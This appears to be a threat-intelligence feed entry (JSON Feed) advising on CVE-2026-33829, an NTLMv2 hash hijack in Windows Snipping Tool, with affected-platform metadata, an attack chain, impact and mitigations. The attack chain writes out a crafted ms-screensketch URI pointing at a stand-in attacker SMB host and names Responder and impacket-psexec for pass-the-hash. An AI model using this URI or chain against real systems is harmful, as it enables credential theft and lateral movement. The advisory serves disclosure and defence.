{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/cpes/cpe2.3omicrosoftwindows_11_25h2arm64/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":["cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x64:*","cpe:2.3:o:microsoft:windows_10_1607:*:*:*:*:*:*:x86:*","cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x64:*","cpe:2.3:o:microsoft:windows_10_1809:*:*:*:*:*:*:x86:*","cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:arm64:*","cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:x64:*","cpe:2.3:o:microsoft:windows_10_21h2:*:*:*:*:*:*:x86:*","cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:arm64:*","cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:x64:*","cpe:2.3:o:microsoft:windows_10_22h2:*:*:*:*:*:*:x86:*","cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:arm64:*","cpe:2.3:o:microsoft:windows_11_23h2:*:*:*:*:*:*:x64:*","cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:arm64:*","cpe:2.3:o:microsoft:windows_11_24h2:*:*:*:*:*:*:x64:*","cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:arm64:*","cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:x64:*","cpe:2.3:o:microsoft:windows_11_26h1:*:*:*:*:*:*:arm64:*","cpe:2.3:o:microsoft:windows_11_26h1:*:*:*:*:*:*:x64:*","cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*","cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"],"_cs_cves":[{"cvss":4.3,"id":"CVE-2026-33829"}],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["Windows Snipping Tool"],"_cs_severities":["medium"],"_cs_tags":["credential-access","ntlmv2","pass-the-hash","cve-2026-33829"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eA public exploit (EDB-52567) has been published detailing an NTLMv2 Hash Hijack vulnerability (CVE-2026-33829) within the Windows Snipping Tool. This vulnerability allows an attacker to force a victim system to authenticate to a remote SMB server under the attacker\u0026rsquo;s control. The exploit leverages a specially crafted \u003ccode\u003ems-screensketch:edit\u003c/code\u003e URI. When a user clicks a malicious link and approves the \u0026ldquo;Open Snipping Tool\u0026rdquo; prompt, their NTLMv2 hash is sent to the attacker\u0026rsquo;s server. This exploit extends beyond the original vector by also attempting to harvest HTTP NTLM hashes via WPAD, LLMNR, and MDNS poisoning, potentially capturing multiple valid hashes from a single user interaction. The affected systems include Windows 10, Windows 11, and Windows Server versions 2012 through 2025 (prior to the April 14, 2026 patch).\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker sets up a malicious SMB server and Responder on Kali Linux.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious HTML page containing an \u003ccode\u003ems-screensketch:edit\u003c/code\u003e URI pointing to the attacker\u0026rsquo;s SMB server: \u003ccode\u003ems-screensketch:edit?filePath=\\\\\u0026lt;ATTACKER_IP\u0026gt;\\test\\evil.png\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker hosts the malicious HTML page on an HTTP server.\u003c/li\u003e\n\u003cli\u003eThe victim browses to the malicious page and clicks a link or button that triggers the \u003ccode\u003ems-screensketch:edit\u003c/code\u003e URI.\u003c/li\u003e\n\u003cli\u003eThe victim\u0026rsquo;s system prompts them to \u0026ldquo;Open Snipping Tool\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003eIf the user approves the prompt, Windows attempts to authenticate to the attacker\u0026rsquo;s SMB server using NTLMv2.\u003c/li\u003e\n\u003cli\u003eResponder captures the NTLMv2 hash from the authentication attempt.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the captured NTLMv2 hash in a Pass-the-Hash attack using tools like \u003ccode\u003eimpacket-psexec\u003c/code\u003e to gain unauthorized access to other systems on the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-33829 allows an attacker to capture a user\u0026rsquo;s NTLMv2 hash. This hash can then be used in Pass-the-Hash attacks, enabling lateral movement and potentially leading to domain compromise. While the CVSS score is rated as Medium (4.3), the impact in practice can be High, as credential theft can lead to significant data breaches and system compromise. The number of potential victims is broad, encompassing any unpatched Windows 10, 11, or Server system.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply the Microsoft patch released on April 14, 2026, to remediate CVE-2026-33829.\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rule \u0026ldquo;Detect Snipping Tool NTLMv2 Hash Hijack Attempt via URI\u0026rdquo; to detect attempts to exploit this vulnerability.\u003c/li\u003e\n\u003cli\u003eBlock outbound SMB traffic (port 445) to prevent successful NTLMv2 hash capture.\u003c/li\u003e\n\u003cli\u003eDisable NTLMv1 and restrict NTLMv2 via Group Policy to mitigate the risk of Pass-the-Hash attacks after successful exploitation.\u003c/li\u003e\n\u003cli\u003eEducate users about the risks of clicking \u0026ldquo;Open Snipping Tool\u0026rdquo; prompts from untrusted sources.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-15T14:50:44Z","date_published":"2026-05-15T14:50:44Z","id":"https://feed.craftedsignal.io/briefs/2026-05-snipping-tool-ntlm-hijack/","summary":"A local exploit has been published for Windows Snipping Tool (CVE-2026-33829), enabling NTLMv2 Hash Hijacking by forcing authentication to a remote SMB server via a crafted ms-screensketch:edit URI, potentially leading to credential theft and lateral movement.","title":"Windows Snipping Tool NTLMv2 Hash Hijack Vulnerability (CVE-2026-33829)","url":"https://feed.craftedsignal.io/briefs/2026-05-snipping-tool-ntlm-hijack/"}],"language":"en","title":"CraftedSignal Threat Feed — Cpe:2.3:o:microsoft:windows_11_25h2:*:*:*:*:*:*:arm64:*","version":"https://jsonfeed.org/version/1.1"}